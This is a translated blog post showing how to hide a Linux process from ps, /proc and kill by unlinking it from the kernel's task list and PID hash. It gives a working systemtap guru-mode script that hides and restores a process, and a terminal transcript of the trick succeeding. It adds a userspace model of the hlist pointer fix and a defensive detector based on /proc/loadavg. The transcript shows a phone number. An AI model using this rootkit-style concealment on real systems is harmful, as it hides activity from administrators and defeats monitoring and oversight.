How can a process hide itself on a Linux system?

Although logging in as root is not exactly recommended on Linux, a lot of the time we still do, so this article assumes you are logged in as root.

Suppose you want to write a process that quietly does something naughty, or that brazenly keeps printing the manager's phone number to the screen, and you want the manager either unable to find it at all or, if he does find it, unable to do anything about it.

Yes, you definitely want to do that, just like me, and all you need is to hide the process.

Hiding a process from the manager is craft work, and there are far too many methods: use LD_PRELOAD to rewrite what ps prints, remount procfs with a filter that drops certain processes, and so on.

But those are all too complicated! Here is the most direct way: remove the process you want to hide from the corresponding data structures directly in the kernel.

Remove it from where, specifically?

We know that there are two ways to find a process, corresponding to two lookup paths:

  • Traversing the system's tasks list (init_task.tasks) and checking each task in turn, which is what for_each_process() does. We need to remove the task from that list.
  • Looking it up by PID: the pid is resolved and pid_task() then reads the hlist pid->tasks[PIDTYPE_PID]. This is the path taken by /proc (and therefore by ps), by kill(2), and by most other pid-based syscalls. We need to remove the task from that PIDTYPE_PID hlist.

It's that simple.

But once the whole thing is done and the manager has been had, we still need to be able to restore the hidden process, so the script also has to un-hide it.

Well, here is the code. I used systemtap's guru (expert) mode, which lets C be embedded in the systemtap script, and ran it one-shot.

The code is as follows:

// hide_process.stp
%{
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/pid.h>
%}

function hide_your_process:long(pid:long, type:long, addr:long)
%{
	struct task_struct *task = NULL;
	struct pid_link *link = NULL;

	if (STAP_ARG_type == 0) {
		struct hlist_node *node = NULL;
		task = pid_task(find_vpid(STAP_ARG_pid), PIDTYPE_PID);
		if (!task) {
			// Bad pid: do not dereference NULL inside the kernel
			STAP_PRINTF("No such pid: %ld\n", (long)STAP_ARG_pid);
			STAP_RETVALUE = -1;
		} else {
			link = &task->pids[PIDTYPE_PID];

			// 1. Unlink from init_task's tasks list (for_each_process walkers).
			//    INIT_LIST_HEAD makes the node self-referential, so the
			//    list_del_rcu() in __unhash_process() at exit is a harmless no-op.
			list_del_rcu(&task->tasks);
			INIT_LIST_HEAD(&task->tasks);
			// 2. Unlink from pid->tasks[PIDTYPE_PID], so pid_task() (and with it
			//    /proc, ps, kill ...) no longer finds the task.
			node = &link->node;
			hlist_del_rcu(node);
			INIT_HLIST_NODE(node);
			// Very important! INIT_HLIST_NODE leaves pprev NULL and __hlist_del()
			// writes through pprev unconditionally, so without this line a Ctrl-C on
			// the hidden process, or any fatal signal sent to it from the foreground,
			// crashes in detach_pid(). Pointing pprev at our own next field makes
			// that write a no-op.
			node->pprev = &node->next;
			STAP_PRINTF("Address of the process to hide: %p  Remember it! Pass it as the third argument when restoring\n", task);
			STAP_RETVALUE = 0;
		}

	} else if (STAP_ARG_type == 1) {
		task = (struct task_struct *)STAP_ARG_addr;
		link = &task->pids[PIDTYPE_PID];

		// Put the task back on both structures, in the reverse order
		hlist_add_head_rcu(&link->node, &link->pid->tasks[PIDTYPE_PID]);
		list_add_tail_rcu(&task->tasks, &init_task.tasks);
		STAP_PRINTF("Hidden process [%p] has been restored!\n", task);
		STAP_RETVALUE = 0;
	} else {
		STAP_RETVALUE = -1;
	}
%}

probe begin
{
	printf("Hide:    stap -g hide_process.stp $pid 0 1234\n");
	printf("Restore: stap -g hide_process.stp 1234 1 $address_printed_when_hiding\n\n");
	hide_your_process($1, $2, $3);
	exit(); // one-shot mode
}

Now let's look at the effect (the original post has a screenshot here; the terminal transcript further down shows the same thing).

As for bugs such as the list operations taking no locks: you can add the locking (the kernel itself holds tasklist_lock when it unhashes a task), and leaving it out does not stop the trick from working on a quiet machine, but a concurrent fork/exit or a /proc reader on another CPU can observe the lists mid-update. Two more caveats. First, once hidden the task is also invisible to kill(2) and to anything else that resolves a pid through pid_task(), so apart from the restore path only a signal delivered through the terminal's process group can still reach it. Second, the code relies on the task->pids[] layout of 3.x-era kernels; from 4.19 on, task_struct has task->pid_links[] and task->thread_pid instead, and the script needs adjusting.
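The pprev line in the script is the part that is easiest to get wrong, so here is an added example (my code, not from the original post) that models it in user space: copies of the kernel's list.h and hlist semantics, simplified stand-ins for task_struct, struct pid and init_task (the fake_task and fake_pid names are assumptions of this model), and the two unlink variants. It shows that INIT_LIST_HEAD makes a later list_del a no-op, while INIT_HLIST_NODE alone leaves pprev NULL so the detach on exit would write through a NULL pointer; the self-reference removes that write.

```c
/* Added example (not the post's code): a userspace model of why the hidden
 * task's hlist node must be made self-referential before the task exits.
 * The list primitives copy the kernel's list.h (non-RCU variants; the RCU
 * ones only add barriers). fake_task/fake_pid are simplified stand-ins. */
#include <stddef.h>
#include <stdio.h>

struct list_head  { struct list_head *next, *prev; };
struct hlist_head { struct hlist_node *first; };
struct hlist_node { struct hlist_node *next, **pprev; };

static void INIT_LIST_HEAD(struct list_head *l) { l->next = l->prev = l; }
static void list_add_tail(struct list_head *n, struct list_head *head)
{
    n->next = head; n->prev = head->prev;
    head->prev->next = n; head->prev = n;
}
/* __list_del: harmless on a node whose next/prev point to itself */
static void list_del(struct list_head *e)
{
    e->next->prev = e->prev; e->prev->next = e->next;
}
static void INIT_HLIST_NODE(struct hlist_node *n) { n->next = NULL; n->pprev = NULL; }
static void hlist_add_head(struct hlist_node *n, struct hlist_head *h)
{
    n->next = h->first;
    if (h->first) h->first->pprev = &n->next;
    h->first = n;
    n->pprev = &h->first;
}
/* __hlist_del writes through pprev unconditionally. The real kernel would
 * oops on a NULL pprev; this model reports it as a return value instead. */
static int hlist_del_checked(struct hlist_node *n)
{
    struct hlist_node *next = n->next, **pprev = n->pprev;
    if (pprev == NULL) return -1;
    *pprev = next;
    if (next) next->pprev = pprev;
    return 0;
}

/* Stand-ins for task_struct and struct pid */
struct fake_task { int pid; struct list_head tasks; struct hlist_node pid_node; };
struct fake_pid  { struct hlist_head tasks; };

static int count_tasks(struct list_head *head)
{
    int n = 0;
    for (struct list_head *p = head->next; p != head; p = p->next) n++;
    return n;
}
static int count_pid_tasks(struct fake_pid *pid)
{
    int n = 0;
    for (struct hlist_node *p = pid->tasks.first; p; p = p->next) n++;
    return n;
}

/* The post's hide step; selfref selects whether pprev is repaired */
static void hide(struct fake_task *t, int selfref)
{
    list_del(&t->tasks);
    INIT_LIST_HEAD(&t->tasks);               /* later list_del() is a no-op */
    hlist_del_checked(&t->pid_node);
    INIT_HLIST_NODE(&t->pid_node);           /* pprev is now NULL ... */
    if (selfref)
        t->pid_node.pprev = &t->pid_node.next;   /* ... so point it at ourselves */
}

/* What __unhash_process()/detach_pid() do when the hidden task exits:
 * 0 if the exit path survives, -1 if it would have oopsed. */
static int simulate_exit(struct fake_task *t)
{
    list_del(&t->tasks);
    return hlist_del_checked(&t->pid_node);
}

/* Build init_task plus one victim, hide it, verify it is gone, let it exit. */
static int exit_after_hide(int selfref)
{
    struct list_head init_task;
    struct fake_pid pid = { { NULL } };
    struct fake_task victim = { 6607 };
    INIT_LIST_HEAD(&init_task);
    list_add_tail(&victim.tasks, &init_task);
    hlist_add_head(&victim.pid_node, &pid.tasks);
    hide(&victim, selfref);
    if (count_tasks(&init_task) != 0 || count_pid_tasks(&pid) != 0)
        return -2;                           /* hide did not actually unlink */
    return simulate_exit(&victim);
}

int main(void)
{
    printf("INIT_HLIST_NODE only : %s\n", exit_after_hide(0) == 0 ? "ok" : "would oops");
    printf("pprev = &node->next  : %s\n", exit_after_hide(1) == 0 ? "ok" : "would oops");
    return 0;
}
```

The asymmetry is the whole point: a list_head can be made self-referential with INIT_LIST_HEAD because both links point back at the node, but an hlist_node has no backward node pointer, only pprev, and INIT_HLIST_NODE sets that to NULL rather than to something safe to write through.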

Also, many people feel this could be done by modifying the procfs lookup of the task directory, but I think that is too complicated. Mine is the simplest: a few lines of code. Code craftsmanship does not help much here, so a bit of trickery is called for.

Let's play with it:

[root@localhost ~]#
[root@localhost ~]# ./JingLi\'SkinShoe
The manager's leather shoes got wet, but he won't get fat! If he does get fat, contact the manager: 15618501939
The manager's leather shoes got wet, but he won't get fat! If he does get fat, contact the manager: 15618501939
The manager's leather shoes got wet, but he won't get fat! If he does get fat, contact the manager: 15618501939
The manager's leather shoes got wet, but he won't get fat! If he does get fat, contact the manager: 15618501939
The manager's leather shoes got wet, but he won't get fat! If he does get fat, contact the manager: 15618501939
The manager's leather shoes got wet, but he won't get fat! If he does get fat, contact the manager: 15618501939

Now hide it:

[root@localhost test]# ps -e |grep JingLi
 6607 pts/1    00:00:00 JingLi'SkinShoe
[root@localhost test]# stap -g ./hide_process.stp 6607 0 12345
Hide:    stap -g hide_process.stp $pid 0 1234
Restore: stap -g hide_process.stp 1234 1 $address_printed_when_hiding

Address of the process to hide: 0xffff8800365818c0  Remember it! Pass it as the third argument when restoring

ps can't see it any more...

[root@localhost test]# ps -e |grep JingLi
[root@localhost test]# echo $?
1
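How would a defender notice a task unlinked this way? It no longer appears in /proc, but it is still alive and still counted in nr_threads, the counter the kernel prints as the "total" half of the running/total field of /proc/loadavg, which is only decremented when a task really exits. This added example (my code, not the post's) compares that figure with the number of /proc/<pid>/task/<tid> entries; a positive difference that stays stable across a few samples points at a task that procfs cannot enumerate. The fake proc tree it builds under /tmp is constructed so the check can be run offline; the sample loadavg line is likewise made up.

```c
/* Added example (not the post's code): compare the kernel's own task count
 * (nr_threads, printed in /proc/loadavg) with the tasks procfs enumerates. */
#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

static int is_numeric(const char *s)
{
    if (!*s) return 0;
    for (; *s; s++)
        if (*s < '0' || *s > '9') return 0;
    return 1;
}

/* Total tasks the kernel believes exist: the "total" in the running/total
 * field of /proc/loadavg. Returns -1 if the line does not parse. */
static long loadavg_total(const char *line)
{
    double a, b, c;
    long running, total;
    if (sscanf(line, "%lf %lf %lf %ld/%ld", &a, &b, &c, &running, &total) != 5)
        return -1;
    return total;
}

/* Count every <procroot>/<pid>/task/<tid> directory, i.e. the tasks that
 * procfs enumeration (the path ps uses) can still see. -1 on error. */
static long count_visible_threads(const char *procroot)
{
    DIR *proc;
    struct dirent *pe;
    long n = 0;
    if (!procroot || !(proc = opendir(procroot))) return -1;
    while ((pe = readdir(proc)) != NULL) {
        char path[512];
        DIR *task;
        struct dirent *te;
        if (!is_numeric(pe->d_name)) continue;
        snprintf(path, sizeof path, "%s/%s/task", procroot, pe->d_name);
        if (!(task = opendir(path))) continue;   /* exited between readdirs */
        while ((te = readdir(task)) != NULL)
            if (is_numeric(te->d_name)) n++;
        closedir(task);
    }
    closedir(proc);
    return n;
}

/* Tasks counted by the kernel but missing from procfs: 0 on a clean box,
 * positive (and stable across samples) when something has been unlinked. */
static long hidden_thread_count(const char *loadavg_line, const char *procroot)
{
    long total = loadavg_total(loadavg_line);
    long visible = count_visible_threads(procroot);
    if (total < 0 || visible < 0) return -1;
    return total - visible;
}

/* Constructed stand-in for /proc (assumes /tmp is writable): two processes,
 * one of them two-threaded, so exactly three tasks are visible. */
static const char *make_fake_proc(void)
{
    static char root[64];
    const char *dirs[] = { "100", "100/task", "100/task/100",
                           "200", "200/task", "200/task/200", "200/task/201",
                           "self", "sys" };
    char path[128];
    size_t i;
    if (root[0]) return root;                /* already built */
    snprintf(root, sizeof root, "/tmp/fakeproc.%ld", (long)getpid());
    if (mkdir(root, 0700) != 0) { root[0] = 0; return NULL; }
    for (i = 0; i < sizeof dirs / sizeof dirs[0]; i++) {
        snprintf(path, sizeof path, "%s/%s", root, dirs[i]);
        mkdir(path, 0700);
    }
    return root;
}

int main(void)
{
    char line[128] = "";
    FILE *f = fopen("/proc/loadavg", "r");
    /* Live check against the real /proc (off by a task or two under load) */
    if (f && fgets(line, sizeof line, f))
        printf("kernel total - visible in /proc = %ld\n",
               hidden_thread_count(line, "/proc"));
    if (f) fclose(f);
    /* Deterministic check on the constructed tree: 4 claimed, 3 visible */
    printf("fake tree: %ld hidden\n",
           hidden_thread_count("0.00 0.01 0.05 1/4 6607", make_fake_proc()));
    return 0;
}
```

Run it a few times in a row on a real box: the live figure jitters by one or two while processes come and go, but a constant surplus is the signature of a task that the kernel still schedules and procfs can no longer list. Kernel threads appear in /proc as well, so on a clean system the two numbers agree.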

Wenzhou leather shoes get wet; rainwater won't make them swell.



Source: blog.csdn.net/dog250/article/details/105270500